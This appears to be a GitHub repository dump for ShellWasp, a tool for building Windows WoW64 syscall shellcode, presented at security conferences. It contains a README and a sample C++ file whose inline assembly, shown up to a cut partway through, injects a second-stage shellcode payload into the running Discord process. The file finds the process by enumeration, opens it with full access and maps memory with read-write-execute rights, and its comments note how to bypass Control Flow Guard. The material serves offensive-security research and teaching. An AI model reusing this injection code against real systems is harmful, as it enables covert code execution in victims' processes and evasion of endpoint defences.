[ { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2022 Bramwell Brizendine\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# ShellWasp 2.1\n\n\nShellWasp is a the original tool to faciliate creating shellcode utilizing syscalls. ShellWasp helps build templates for 32-bit WoW64 shellcode that uses Windows syscalls while avoiding the portability problem that comes with hardcoded SSNs across OS builds.\n\nShellWasp was first released at DEF CON 30 in August 2022. Since then it has expanded considerably. Version 2.0 added alternative ways to discover OSBuild, including User_Shared_Data and PEB via r12, along with three new ways to invoke the syscall through WoW64: one for Windows 7 and two for Windows 10/11. With ShellWasp 2.1, we have added new capabilities to get sample, illustrative values for function parameters - both from a pre-computed, offline mode and generated on the fly from AI (if an OpenAI key is provided). There are plans for additional new features in the coming months. There will be other maintenance updates coming soon as well. \n\n## Presentations and Background\nThe primary resource on using Windows syscalls in shellcode can be found in the most recent, definitive conference presentation, from HITB Amsterdam 2023 page for further details, including full-length, hour long video, detailed slides, to learn more about this project: https://conference.hitb.org/hitbsecconf2023ams/session/windows-syscalls-in-shellcode-advanced-techniques-for-malicious-functionality/\nSlides are available for download at HITB. This project has evolved tremendously since its initial debut at [DEFCON 30](https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Tarek%20Abdelmotaleb%20%20%20Dr.%20Bramwell%20Brizendine%20-%20Weaponizing%20Windows%20Syscalls%20as%20Modern%2032-bit%20Shellcode.pdf). \nShellWasp was also presented as part of a Black Hat MEA briefing in 2022, and slides and white paper are available within the GitHub repository. Both the Black Hat and DEF CON presentations were superceded by the Hack in the Box Amsterdam 2023 presetnation, which contains significanlty more new content and several novel features for ShellWasp\n\n## What ShellWasp Does\n ShellWasp is a way to help perform syscalls in WoW64 shellcode, and the latest version features multiple, novel methods of invoking the syscall in a WoW64 environment, as detailed in the HITB Amsterstam 2023 talk. \n\n ShellWasp automates building templates of syscall shellcode. The template is intended to be just that - a template. The user still needs to determine what parameter values to use and how to build any required structures. The goal is to make handcrafted syscall shellcode more manageable, especially when multiple syscalls are involved. Nearly all user-mode syscalls supported, including all the ones I could find function prototypes for. ShellWasp also solves the syscall portability problem for syscalls. It identifies the OS build, and ShellWasp creates a syscall arrray in response to user input, allowing the current syscall values (SSNs) to be found at runtime, rather than having to be hardcoded, which can limit how you can use them across OS builds. ShellWasp takes care of managing the syscall array, so if a syscall is used multiple times, there will only be one entry in the syscall array. Thus, ShellWasp will allows syscall values (SSNs) to be obtained dynamically. If you are building complex syscall shellcode with multiple syscalls being used (not for the faint-hearted), and you want to make sure there is no common way of invoking it, such as fs:0xc0, then these new additions may be of interest. Though for simplicity's sake, I recommend beginning with the \"simpler\" way of invoking it, via fs:0xc0. \n\nThe shellcode size created by ShellWasp is relatively small in size. Users can select the OS builds to support, and it is recommend to use perhaps just some of the most recent ones from Windows 7/10/11, rather than every possible one. This can help keep size more manageable. Additionall, the way in which syscalls are called differs from Windows 7 and Windows 10/11. ShellWasp will automatically take care of that based on the selections the user makes. We have created syscall shellcode that works across all three OS, using our technique.\n\nTo achieve a more compact shellcode size, ShellWasp utilizes precomputed syscall tables in JSON format, as opposed to dynamic SSN resolution techniques, which may lengthen the shellcode. This allows us to keep the shellcode size minimal. \n\nShellWasp supports nearly all user-mode syscalls for which I could find function prototypes. It identifies the OS build and creates a syscall array based on user input, allowing the current SSNs to be found at runtime rather than hardcoded. If a syscall is used multiple times, ShellWasp manages that for you so there is only one entry in the syscall array.\n\n## Scope\nShellWasp is geared toward 32-bit WoW64 shellcode. It is not meant as a replacement for SysWhispers2, FreshyCalls, or related work. This is a different direction for utilizing Windows syscalls and is focused on shellcode specifically. The point is not just how to recover the SSN. The point is helping facilitate syscall shellcode in a compact and reliable form.\n\n## Why ShellWasp May Be Useful\nIf you are building more complex syscall shellcode and do not want to rely only on a common mechanism such as fs:0xc0, the novel WoW64 invocation methods provided by ShellWasp may be useful. That said, for simplicity's sake, I still recommend beginning with the simpler approach via fs:0xc0, before moving onto more advanced techniques. ShellWasp is most useful when you want portability across supported Windows releases, compact output, and a cleaner way to manage repeated syscall use in one piece of shellcode.\n\nShellWasp 2.0 includes some alternative ways to discover the OSBuild. ShellWasp 2.0 additionally provides three new ways to invoke the syscall from WoW64, all without syscall, int 0x2e or fs:0xc0 - two for Windows 10/11 and one for Windows 7. These two new methods have not been seen before (see below images).\n\nShellWasp is not an alternative to SysWhispers2/3 or the work of ElephantSe4l, with Freshycalls, etc. This is a different direction for utilizing Windows syscalls. The method of determing OS build or the SSN is not important. (ShellWasp provides a few ways to determine this.) ShellWasp is about helping faciliate syscall shellcode in a compact and reliable form.\n\n## Optional 2.1 Parameter Support (New)\n\nShellWasp 2.1 adds the ability to generate sample, illustrative parameter values. These can come either from a precomputed offline mode or, if an OpenAI key is provided, through AI-assisted generation. These are intended as learning aids and starting points, not as finished parameter choices. ShellWasp does not build end-to-end shellcode, but helps you start the process. This can be rather useful, as it might expose some necessary values that might not be easily found.\n\n## Using ShellWasp\nThe assembly generated by ShellWasp is relatively compact. Users can select the OS builds to support and the syscalls to include. It is usually not necessary to target every supported build. In many cases, selecting only the releases you care about will help keep the resulting shellcode size more manageable. Be realistic - if this is being done for offensive security purposes, is it really necessary to target every os build? It is certainly an option if payload size is not a consideration. The Assembly generated by ShellWasp is intended to be more compact in size. Additionally, as many people have automatic Windows update, it may be desirable to select only more recent OS builds, rather than every possible one, and this helps reduce size as well. Users can easily and quickly rearrange syscalls in shellcode. \n\nShellWasp takes care of much of the bookkeeping, but you still need to supply the parameter values and build out any required structures. For hints and tips, use the pre-computed illustrative samples or generate something on the fly with an AI key. Though keep in mind - these are just starting points, which may or may not be appropriate for your project. Working to build syscall shellcode is an iterative process requiring trial and error.\n\nA reminder: ShellWasp only supports Windows 7/10/11 at the moment, as a desing choice. It is easy to select desired Windows releases via config file or UI. Changes can also be saved to the to config.\n\n## Quick Start\n\nDownload the repository and run it from the command line: `py shellWasp.py`\n\nYou can also use `python shellWasp.py` if that is how Python is configured on your system.\n\nDesired settings for selected OS builds and Windows syscalls can be added to the config file or changed in the UI. Those settings can also be saved back to the config.\n\n## Installation\n\nA setup file is provided to help ensure the needed libraries are installed:\n\n`py setup.py install`\n\nYou may substitute `python` for `py` as needed.\n\nThis installs the required libraries, including `colorama` and `keystone-engine`. Keystone is used to assemble the generated code so the assembly can be validated. ShellWasp is still intended to produce a template whose parameters need to be customized, so the generated bytes are not the main focus of the tool.\n\nIf you do not want to use `setup.py`, you can install the dependencies manually:\n\n`pip install keystone-engine`\n\n`pip install colorama`\n\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/shellwasp1.png?raw=true)\n\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/shellwasp3.png?raw=true)\n\n![image](https://user-images.githubusercontent.com/49998815/201258739-bc8e4f11-d737-4a1f-a8e5-7f827f701717.png)\nNote: You select the OS builds to target--it is not necessary to target every single build--and you select the syscalls to use. The above is just a random illustration. ShellWasp takes care of a lot of the details, but you still need to build out the parameters and required structures.\n\n\n\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/osbuild3.png?raw=true)\n\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/fsyscall.png.png?raw=true)\n\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/osbuild2.png?raw=true)\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/multWays.png?raw=true)\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/alt_invoke.png?raw=true)\n![image](https://github.com/Bw3ll/ShellWasp/blob/main/images/altinvoke2.png?raw=true)\n\n## Repository Layout\n\n* `shellWasp.py` - small launcher for the tool\n* `start/shellWasp.py` - main implementation\n* `start/config.cfg` - configuration for OS builds and syscall choices\n* `start/ui.py` - UI support\n* `start/WinSysCalls.json` and related files - syscall tables and related data\n* `Samples/` - example files\n* `BH Slides-White paper/` - slides and white paper material\n\n\n## Updates\n* March 2026 update: ShellWasp 2.1 has a major usability upgrade to produce clearer and more realistic parameter generation. It can now produce richer illustrative syscall parameters, with optional structure-aware examples and field-level structure expansions where helpful. These are intended as learning aids. I also added chunked processing and automatic aggregation for larger batches of syscalls while preserving call order and supporting repeated uses of the same export in a single run. To make longer sessions easier to manage, ShellWasp now supports a continuously updated working results file, resume capability, and both timestamped JSON snapshots and cleaned-up text exports for review and reuse. More changes are coming.\n* April 19, 2023 - ShellWasp 2.0 is released with masssive changes, including alternative ways to identify to the OSBuild, and three previously undocumented ways to invoke the syscall via WoW64 (one for Windows 7 and two for Windows 10/11).\n* On Nov. 1, 2022, support was added for Windows 10 22H2 and Windows 11 22H2. These are the newest Windows releases. Note: we do not support Insider preview builds nor Server. \n* On Nov. 1, 2022, the mechanism by which the pointer to the syscall array is preserved has been changed. In testing shellcode with chains of several Windows syscalls, some stability issues were noted with values on the stack. In order to avoid those issues, it was decided to change the stack cleanup (`add esp, 0xXX`) and `pop edi`, to `mov edi, [esp+0xYY]` - YY being the number of bytes that would have been \"cleaned\" from the stack. The `push edi` that follows is retained. ShellWasp maintains a pointer to the syscall array at edi, and since the actual syscall itself destroys the value contained in edi, there needs to be a way to restore it, after the return from the far jump to kernel-mode. It was felt this new Assembly would be a more stable way to accomplish this. Of course, another option could be to have a pointer to the syscall array stored at some location on ebp or other memory, and then that could be used to restore EDI. That would in some ways be simpler, as it would be possible to avoiding needing to count the number of bytes to go back. However, it was felt that `mov edi, [esp+0xYY]` would be safer for novices. If it was stored elsewhere in memory at a fixed location, such as the stack, it could be possible to accidentally overwrite it. Both approaches take minimal time and effort. \n\n## Correction\nPlease note that previous public comments I made regarding sorting by address techniques no longer working were incorrect. I apologize for the error. Keep in mind this tool is geared for WoW64, 32-bit shellcode, not as a replacement for other syscall techniques. Our efforts remain in that WoW64 realm.\n\n## License\nThis project is released under the terms of the MIT license.\n" }, { "path": "Samples/BHMEA _shellcode_injection3.cpp", "content": "// Author: Dr. Bramwell Brizendine\r\n// Event: Black Hat Middle East and Africa in Riyadh, KSA\r\n// This uses the ShellWasp technique for syscall shellcode\r\n// ShellWasp - for Syscall Shellcode: https://github.com/Bw3ll/ShellWasp\r\n\r\n// This inline Assembly can allow the syscall shellcode to be tested (and edited) simply. \r\n// I will release it in shellcode form at a little time--I have some additional minor cleanup to do. \r\n// The pure shellcode (non-inline Assembly) one I have has some minor stability issues before I can release it. \r\n// Description on compiling and using with Developer prompt discussed later.\r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\nusing namespace std;\r\nint main()\r\n{\r\n\r\n// I do not actually use this for the second stage payload. See below with _emit keywords.\r\nunsigned char myShell[] = \"\\x90\\x90\\x90\\x90\\x31\\xc9\\xf7\\xe1\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x14\\xad\\x96\\xad\\x8b\\x58\\x10\\x8b\\x53\\x3c\\x01\\xda\\x8b\\x52\\x78\\x01\\xda\\x8b\\x72\\x20\\x01\\xde\\x31\\xc9\\x41\\xad\\x01\\xd8\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\xe2\\x8b\\x72\\x24\\x01\\xde\\x66\\x8b\\x0c\\x4e\\x49\\x8b\\x72\\x1c\\x01\\xde\\x8b\\x14\\x8e\\x01\\xda\\x89\\xd5\\x31\\xc9\\x51\\x68\\x61\\x72\\x79\\x41\\x68\\x4c\\x69\\x62\\x72\\x68\\x4c\\x6f\\x61\\x64\\x54\\x53\\xff\\xd2\\x68\\x6c\\x6c\\x61\\x61\\x66\\x81\\x6c\\x24\\x02\\x61\\x61\\x68\\x33\\x32\\x2e\\x64\\x68\\x55\\x73\\x65\\x72\\x54\\xff\\xd0\\x68\\x6f\\x78\\x41\\x61\\x66\\x83\\x6c\\x24\\x03\\x61\\x68\\x61\\x67\\x65\\x42\\x68\\x4d\\x65\\x73\\x73\\x54\\x50\\xff\\xd5\\x83\\xc4\\x10\\x31\\xd2\\x31\\xc9\\x52\\x68\\x50\\x77\\x6e\\x64\\x89\\xe7\\x52\\x68\\x59\\x65\\x73\\x73\\x89\\xe1\\x52\\x57\\x51\\x52\\xff\\xd0\\x83\\xc4\\x10\\x68\\x65\\x73\\x73\\x61\\x66\\x83\\x6c\\x24\\x03\\x61\\x68\\x50\\x72\\x6f\\x63\\x68\\x45\\x78\\x69\\x74\\x54\\x53\\xff\\xd5\\x31\\xc9\\x51\\xff\\xd0\";\r\n\r\nvoid* mem2 = malloc(0x1060);\r\nmemcpy(&mem2, &myShell, sizeof(myShell));\r\n\t\r\n\r\n// This syscall shellcode (inlineAssembly version)\r\n\r\n//\t\t; ShellWasp - for Syscall Shellcode: https://github.com/Bw3ll/ShellWasp\r\n// \t\t; \r\n// \t\t; Note: This is proof-of-concept, just to demonstrate what is possible with syscall shellcode.\r\n// \t\t; It utilizes the ShellWasp approach to syscall shellcode, with a syscall array having been created \r\n// \t\t; by it. This syscall shellcode works for Windows 7 and 10/11. Note that with Windows 10/11, CFG will\r\n// \t\t; cause the the second stage shellcode - a messagebox - to immediately terminate. It does, however,\r\n// \t\t; succeed in the sense that all syscalls work. An additional syscall to NtSetInformationVirtualMemory \r\n// ; could create a CFG exception. I had success with the corresponding WinAPI function, \r\n// ; SetProcessValidCallTargets (that is not included). Either one creates a CFG exception that can allow\r\n// ; for the process injection to succeed in spite of CFG. \r\n// ; The goal here is to avoid using WinAPI functions, so that is not included. \r\n// ; Another reader can implement theNtSetInformationVirtualMemory.\r\n// \t\t; With Windows 7, there is no CFG, and it works without issue.\r\n// \t\t;\r\n// \t\t; The goal of this shellcode is to enumerate all active processes, find Discord and determine its \r\n// \t\t; PID,and then to create a library, Urlmon.dll, which is then used to inject a second stage payload. \r\n// \t\t; The originalprocess then must activate the second stage shellcode, which is present in Discord.exe. \r\n// \t\t; In order to do this, the shellcode loads urlmon.dll into the target process and gives it RWX. It \r\n// \t\t; then copies the second stage payload over into our unneeded urlmon.dll, 0x3000 bytes from the start. \r\n// \t\t; The shellcode then begins to execude the second stage shellcode. \r\n\r\n// \t\t; If someone wanted to, they could substitute Discord for test.exe or any non-CFG process on Win10/11, for \r\n// \t\t; testing purposes. CFG does not exist on Win7. \r\n\r\n\r\n//\t; The syscalls utilized follow:\r\n//\t;\t\t1.\tNtAllocateVirtualMemory\r\n//\t;\t\t2.\tNtQuerySystemInformation\r\n//\t;\t\t3.\tNtOpenProcess\r\n//\t;\t\t4.\tNtCreateFile\r\n//\t;\t\t5.\tNtCreateSection\r\n//\t;\t\t6.\tNtMapViewofSection\r\n//\t;\t\t7.\tNtProtectVirtualMemory\r\n//\t;\t\t8.\tNtWriteVirtualMemory\r\n//\t;\t\t9.\tNtCreateThreadEx\r\n//\t;\t\t10.\tNtWaitForSingleObject (optional - not needed for Discord)\r\n//\t;\r\n//\t;\t\tWith inline Assembly, I typically use Sublime to write and then Developer prompt to compile.\r\n//\t;\t\tThe syntax for compiling with Developer Prompt is as follows:\r\n//\t;\t\tcl filename.cpp \r\n//\t;\t\t\r\n//\t;\t\tPlease note also that one reason I use inline Assembly is the ability to use int 3, which is very \r\n//\t;\t\thelpful when debugging in WinDbg. This is a breakpoint. If you do not wish to use those, you will \r\n//\t;\t\twant to comment those out! A program with int 3 can only be run inside a debugger - otherwise it errors\r\n//\t;\t\tout. Thus, if using this outside a debugger, the int 3's should be commented out!!\r\n\r\n\r\n__asm {\r\n\tjmp start\r\n\tourSyscall: ; Syscall Function\r\n\tcmp dword ptr [edi-0x4],0xa\r\n\tjne win7\r\n\r\n\twin10: ; Windows 10/11 Syscall\r\n\tcall dword ptr fs:[0xc0]\r\n\tret\r\n\r\n\twin7: ; Windows 7 Syscall\r\n\txor ecx, ecx\r\n\tlea edx, [esp+4]\r\n\tcall dword ptr fs:[0xc0]\r\n\tadd esp, 4\r\n\tret\r\n\r\n\tstart:\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tmov eax, fs:[0x30]\r\n\tmov ebx, [eax+0xac]\r\n\tmov eax, [eax+0xa4]\r\n\tmov ecx, esp\r\n\tsub esp, 0x1000\r\n\r\n\tcmp bl, 0x64 ; 21H2, Win10 release\r\n\tjl less1\r\n\tpush 0x18 ; NtAllocateVirtualMemory\r\n\tpush 0x36 ; NtQuerySystemInformation\r\n\tpush 0x26 ; NtOpenProcess\r\n\tpush 0x55 ; NtCreateFile\r\n\tpush 0x4a ; NtCreateSection\r\n\tpush 0x28 ; NtMapViewOfSection\r\n\tpush 0x50 ; NtProtectVirtualMemory\r\n\tpush 0x3a ; NtWriteVirtualMemory\r\n\tpush 0xc1 ; NtCreateThreadEx\r\n\tpush 0xd0004 ; NtWaitForSingleObject\r\n\tjmp saveSyscallArray\r\n\tless1:\r\n\tcmp bl, 0x63 ; 21H1, Win10 release\r\n\tjl less2\r\n\tpush 0x18 ; NtAllocateVirtualMemory\r\n\tpush 0x36 ; NtQuerySystemInformation\r\n\tpush 0x26 ; NtOpenProcess\r\n\tpush 0x55 ; NtCreateFile\r\n\tpush 0x4a ; NtCreateSection\r\n\tpush 0x28 ; NtMapViewOfSection\r\n\tpush 0x50 ; NtProtectVirtualMemory\r\n\tpush 0x3a ; NtWriteVirtualMemory\r\n\tpush 0xc1 ; NtCreateThreadEx\r\n\tpush 0xd0004 ; NtWaitForSingleObject\r\n\tjmp saveSyscallArray\r\n\tless2:\r\n\tcmp bl, 0xF0 ; 21H2, Win11 release\r\n\tjl less3\r\n\tpush 0x18 ; NtAllocateVirtualMemory\r\n\tpush 0x36 ; NtQuerySystemInformation\r\n\tpush 0x26 ; NtOpenProcess\r\n\tpush 0x55 ; NtCreateFile\r\n\tpush 0x4a ; NtCreateSection\r\n\tpush 0x28 ; NtMapViewOfSection\r\n\tpush 0x50 ; NtProtectVirtualMemory\r\n\tpush 0x3a ; NtWriteVirtualMemory\r\n\tpush 0xc5 ; NtCreateThreadEx\r\n\tpush 0xd0004 ; NtWaitForSingleObject\r\n\tjmp saveSyscallArray\r\n\tless3:\r\n\tcmp bl, 0xB1 ; Win7, Sp1 release\r\n\tjl end2\r\n\tpush 0x15 ; NtAllocateVirtualMemory\r\n\tpush 0x33 ; NtQuerySystemInformation\r\n\tpush 0x23 ; NtOpenProcess\r\n\tpush 0x52 ; NtCreateFile\r\n\tpush 0x47 ; NtCreateSection\r\n\tpush 0x25 ; NtMapViewOfSection\r\n\tpush 0x4d ; NtProtectVirtualMemory\r\n\tpush 0x37 ; NtWriteVirtualMemory\r\n\tpush 0xa5 ; NtCreateThreadEx\r\n\tpush 0x1 ; NtWaitForSingleObject\r\n\r\n\tsaveSyscallArray:\r\n\tpush eax\r\n\tmov edi, esp\r\n\tadd edi, 0x4\r\n\tmov esp, ecx\r\n\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\r\n\txor ecx, ecx\r\n\tmov [ebp-0x20], ecx\r\n\tmov [ebp-0x30], ecx\r\n\r\n\tmov dword ptr[ebp - 0x18], 0x600000 ; 0x30000\r\n\trestart:\r\n\tpush edi\r\n\r\n\tpush 0x40\t\t\t\t\t\t\t// ; ULONG Protect\r\n\tpush 0x3000 \t\t\t\t\t\t // ; ULONG AllocationType\r\n\tlea ebx, dword ptr[ebp - 0x18]\t\t\r\n\tpush ebx \t\t\t\t\t\t\t//\t; PSIZE_T RegionSize\r\n\txor ecx, ecx \r\n\tpush ecx // ; ULONG_PTR ZeroBits\r\n\t\r\n\tmov dword ptr[ebp - 0x280], 0\r\n\tlea ebx, dword ptr[ebp - 0x280]\t\t\r\n\tpush ebx \t\t\t\t\t\t// ; PVOID *BaseAddress\r\n\tpush -1 \t\t\t\t\t\t\t// ; HANDLE ProcessHandle\r\n\tmov eax, [edi+0x24] ; NtAllocateVirtualMemory syscall\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tcall ourSyscall\r\n\t\t\t\r\n\tmov edi, [esp+0x18]\r\n\r\n\tpush edi\r\n\tlea ecx, dword ptr [ebp-0x20]\r\n\tpush ecx ; PULONecxG ReturnLength\r\n\tmov ecx, dword ptr [ebp-0x18]\r\n\tpush ecx ; ULONG SystemInformationLength\r\n\tmov ecx, dword ptr[ebp - 0x280]\r\n\tpush ecx ; PVOID SystemInformation\r\n\tpush 0x00000005 ; SYSTEM_INFORMATION_CLASS SystemInformationClass -> 0x05 \tSystemProcessInformation\r\n\r\n\tmov eax, [edi+0x20] ; NtQuerySystemInformation syscall\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tcall ourSyscall\r\n\r\n\tmov edi, [esp+0x10]\r\n\tpush edi\r\n\r\n\tmov ecx, dword ptr [ebp-0x20]\r\n\tmov dword ptr[ebp - 0x18], ecx\r\n\r\n\r\n\tmov dword ptr [ebp-0x266], esp\r\n\tcmp eax, 0xC0000004 \r\n\tje restart\r\n\tmov esp, dword ptr [ebp-0x266]\r\n\r\n\txor edx, edx \t\t\t; Discord.exe\r\n\tpush edx\r\n\tmov dx, 0x65 \r\n\tpush dx\r\n\tmov dx, 0x78 \r\n\tpush dx\r\n\tmov dx, 0x65 \r\n\tpush dx\r\n\tmov dx, 0x2e \r\n\tpush dx\r\n\tmov dx, 0x64 \r\n\tpush dx\r\n\tmov dx, 0x72 \r\n\tpush dx\r\n\tmov dx, 0x6f \r\n\tpush dx\r\n\tmov dx, 0x63 \r\n\tpush dx\r\n\tmov dx, 0x73 \r\n\tpush dx\r\n\tmov dx, 0x69 \r\n\tpush dx\r\n\tmov dx, 0x44\r\n\tpush dx\r\n\r\n\r\n\t// xor edx, edx ; test.exe ; if test.exe, must change sizes in repe cmpsb string comparison\r\n\t// push edx\r\n\t// mov dx, 0x65 \r\n\t// push dx\r\n\t// mov dx, 0x78 \r\n\t// push dx\r\n\t// mov dx, 0x65 \r\n\t// push dx\r\n\t// mov dx, 0x2e \r\n\t// push dx\r\n\t// mov dx, 0x74 \r\n\t// push dx\r\n\t// mov dx, 0x73 \r\n\t// push dx\r\n\t// mov dx, 0x65 \r\n\t// push dx\r\n\t// mov dx, 0x74\r\n\t// push dx\r\n\t// // int 3\r\n\r\n\tmov dword ptr [ebp-0xdd], esp\r\n\r\n\txor edx, edx\r\n\tpush edx\t\t ; SecurityQualityOfService\r\n\tpush edx\t\t ; SecurityDescriptor\r\n\tpush edx\t\t ; Attributes\r\n\tpush edx\t\t ; ObjectName\r\n\tpush edx\t\t ; RootDirectory\r\n\tpush 0x00000018 ; Length\r\n\tmov [ebp-0xfe], esp ; _OBJECT_ATTRIBUTES \r\n\r\n ; the searching is borrowed from the presentation Tarek and I did at DEF CON 30-- so that credit goes to Tarek.\r\n\r\n\tenumerateProcesses:\r\n\tmov eax, dword ptr[ebp-0x280] // start of SystemInformation structure, with all processes\r\n\tcmp eax, 0 \t\t\t\t\t ; check to see if reached end\r\n\tje finishedProcesses\r\n\r\n\tmov ebx, dword ptr[ebp - 0x280]\r\n\tmov esi, dword ptr[ebx+0x3c] \t\t; dereferencing the location for unicode string text for process name\r\n\tcmp esi, 0\r\n\tje nextProc\r\n\tmov edi, dword ptr[ebp-0xdd] // Source\r\n\tmov ecx, 8\r\n\t// int 3\r\n\tcld \r\n\trepe cmpsb\t\t\t\t\t\t; check for match for target process\r\n\tjecxz match\r\n\tnextProc:\r\n\tadd eax, dword ptr[eax]\t\t\t; no match - add the size of current entry to enumerate next process\r\n\tmov dword ptr[ebp-0x280], eax \t; save current process \r\n\tjmp enumerateProcesses\r\n\r\n\tfinishedProcesses:\r\n\r\n\tmatch:\r\n\r\n\tmov edi, [esp+0x32]\r\n\r\n\tpush edi\r\n\txor ecx, ecx\r\n\tpush ecx\t\t\t\t; uniquethread\r\n\tpush dword ptr[ebp-0x280]\t\t\t\t; uniqueprocess\r\n\tmov [ebp-0x1ff], esp \t; ptr to ClientId\r\n\r\n\tmov ecx, esp\r\n\tmov eax, dword ptr[ebx+0x44] //pid\r\n\tmov dword ptr[ecx], eax\r\n\r\n\txor edx, edx\r\n\tpush edx\r\n\tmov dword ptr [ebp-0xbe], esp ; ProcessHandle\r\n\tmov ecx, [ebp-0x1ff]\r\n\tpush ecx \t\t ; PCLIENT_ID ClientId\r\n\tmov ecx, [ebp-0xfe]\r\n\tpush ecx \t\t ; POBJECT_ATTRIBUTES ObjectAttributes\r\n\tpush 0x1FFFFF ; ACCESS_MASK AccessMask PROCESS_ALL_ACCESS\r\n\tmov ecx, [ebp-0xbe]\r\n\tpush ecx\t ; PHANDLE ProcessHandle\r\n\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tmov eax, [edi+0x1c] ; NtOpenProcess syscall\r\n\tcall ourSyscall\r\n\r\n\tmov edi, [esp+0x1c]\r\n\t;int 3\r\n\tpush edi\r\n\r\n\t; start ntcreatesection\r\n\r\n\t; create SectionHandle\r\n\txor edx, edx\r\n\tmov [ebp-0x324], edx\r\n\r\n\t; create ObjectAttributes structure\r\n\t; todo\r\n\tmov [ebp-0x342], esp\r\n\r\n\t;create PLARGE_INTEGER MaximumSize\r\n\t; todo\r\n\t; PLARGE_INTEGER ByteOffset\r\n\txor ecx, ecx\r\n\tpush 0x13C000 ; high part 1294336 -> 0x13C000\r\n\tpush ecx \t; low part\r\n\tpush 0x50\r\n\tpush ecx \t; low part\r\n\tmov [ebp-0x348], esp\r\n\r\n\txor edx, edx\r\n\tpush edx\r\n\tmov dx, 0x6c \r\n\tpush dx\r\n\tmov dx, 0x6c \r\n\tpush dx\r\n\tmov dx, 0x64 \r\n\tpush dx\r\n\tmov dx, 0x2e \r\n\tpush dx\r\n\tmov dx, 0x6e \r\n\tpush dx\r\n\tmov dx, 0x6f \r\n\tpush dx\r\n\tmov dx, 0x6d \r\n\tpush dx\r\n\tmov dx, 0x6c \r\n\tpush dx\r\n\tmov dx, 0x72 \r\n\tpush dx\r\n\tmov dx, 0x75 \r\n\tpush dx\r\n\tmov dx, 0x5c \r\n\tpush dx\r\n\tmov dx, 0x34 \r\n\tpush dx\r\n\tmov dx, 0x36 \r\n\tpush dx\r\n\tmov dx, 0x57 \r\n\tpush dx\r\n\tmov dx, 0x4f \r\n\tpush dx\r\n\tmov dx, 0x57 \r\n\tpush dx\r\n\tmov dx, 0x73 \r\n\tpush dx\r\n\tmov dx, 0x79 \r\n\tpush dx\r\n\tmov dx, 0x53 \r\n\tpush dx\r\n\tmov dx, 0x5c \r\n\tpush dx\r\n\tmov dx, 0x73 \r\n\tpush dx\r\n\tmov dx, 0x77 \r\n\tpush dx\r\n\tmov dx, 0x6f \r\n\tpush dx\r\n\tmov dx, 0x64 \r\n\tpush dx\r\n\tmov dx, 0x6e \r\n\tpush dx\r\n\tmov dx, 0x69 \r\n\tpush dx\r\n\tmov dx, 0x57 \r\n\tpush dx\r\n\tmov dx, 0x5c \r\n\tpush dx\r\n\tmov dx, 0x3a \r\n\tpush dx\r\n\tmov dx, 0x63 \r\n\tpush dx\r\n\tmov dx, 0x5c \r\n\tpush dx\r\n\tmov dx, 0x3f \r\n\tpush dx\r\n\tmov dx, 0x3f \r\n\tpush dx\r\n\tmov dx, 0x5c\r\n\tpush dx\r\n\r\n\tmov [ebp-0x2fd], esp\r\n\t; int 3\r\n\t; UNICODE_STRING REG_PATH\r\n\txor edx, edx\r\n\tpush dword ptr [ebp-0x2fd] ; Buffer\r\n\tmov dx, 70\r\n\tpush dx ; Max Length\r\n\tmov dx, 68\r\n\tpush dx ; Length\r\n\tmov [ebp-0xed], esp ; \r\n\t; _IO_STATUS_BLOCK \r\n\txor ecx, ecx\r\n\tpush ecx ; ulong_ptr information\r\n\tpush ecx ; pvoid pointer reserved\r\n\tpush ecx ; ntstatus status\r\n\tmov [ebp-0x48], esp ; out PIO_STATUS_BLOCK IoStatusBlock\r\n\r\n\t; _OBJECT_ATTRIBUTES\r\n\txor edx, edx\r\n\txor ecx, ecx\r\n\tpush edx ; SecurityQualityOfService = NULL\r\n\tpush edx ; SecurityDescriptor = NULL\r\n\tinc ecx\r\n\tshl ecx, 6\r\n\tpush ecx ; Attributes = OBJ_CASE_INSENSITIVE = 0x40 \r\n push dword ptr [ebp-0xed] ; UNICODE_STRING\r\n\tpush edx ; Root Directory = NULL\r\n\tpush 0x18 ; Length\r\n\tmov [ebp-0x24], esp ; OBJECT_ATTR\r\n\t\r\n\txor ecx, ecx\r\n\tmov [ebp-0x3dd], ecx ; PHANDLE FileHandle\r\n\tmov [ebp-0xee], ecx ; out PIO_STATUS_BLOCK IoStatusBlock\r\n\r\n\t; start ntcreatefile\r\n\tpush 0x00000000 ; ULONG EaLength\r\n\tpush 0x00000000 ; PVOID EaBuffer\r\n\tpush 0x00000860 ; ULONG CreateOptions 